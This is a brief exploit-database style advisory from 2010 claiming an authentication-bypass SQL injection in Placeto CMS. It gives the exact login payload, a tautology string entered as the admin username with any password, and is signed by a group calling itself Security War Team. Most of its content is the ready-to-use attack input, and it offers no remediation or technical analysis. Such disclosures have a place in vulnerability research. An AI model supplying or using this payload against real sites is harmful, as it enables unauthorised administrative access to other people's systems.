Placeto CMS suffers from a remote SQL injection vulnerability that allows for authentication bypass.
bd05f67974eb20964247328eefbb3615760b02ff69f46254199a4fe63efe3784
#########################################################################################
# Exploit Title : Placeto CMS Auth. Bypass Vulnerability
# Date : 15 - 5 - 2010
# Author : S.W.T
# Version : All Versions
# Tested on : Linux
# Home : WwW.SeC-WaR.CoM <http://www.sec-war.com/>
#########################################################################################
Go To The Admin Panel , And Enter The Following
Username = or'1'='1'
Password = S.W.T
#########################################################################################
This Is Security War Team
Penetration Testing & Ethical Hacking
./Done
#########################################################################################